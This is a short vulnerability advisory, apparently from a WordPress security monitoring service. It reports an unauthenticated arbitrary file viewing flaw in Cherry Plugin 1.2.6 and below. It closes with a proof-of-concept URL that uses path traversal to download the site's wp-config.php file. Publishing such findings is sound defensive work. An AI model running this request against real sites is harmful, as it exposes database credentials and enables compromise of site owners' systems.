One of the things that we do to keep track of the plugin vulnerabilities out there is to monitor hacking attempts on our websites. That sometimes leads us to finding what looks to be exploitation of vulnerabilities that a hacker has just discovered. In other cases it shows really old vulnerabilities that hackers are still trying to exploit. We have recently had some attempts to exploit a couple of vulnerabilities in older versions of the plugin Cherry Plugin. One was an arbitrary file upload vulnerability mentioned here and the other was an arbitrary file viewing vulnerability that we couldn’t find any prior mention of.
In version 1.2.6 and below the file /admin/import-export/download-content.php will serve up the contents of any file requested. It looks like that functionality was intended to be only accessible by admins, but there were no restrictions in place to prevent anyone else from accessing it.
Proof of Concept
The following proof of concept will download the website’s wp-config.php file.
Make sure to replace “[path to WordPress]” with the location of WordPress:
http://[path to WordPress]/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php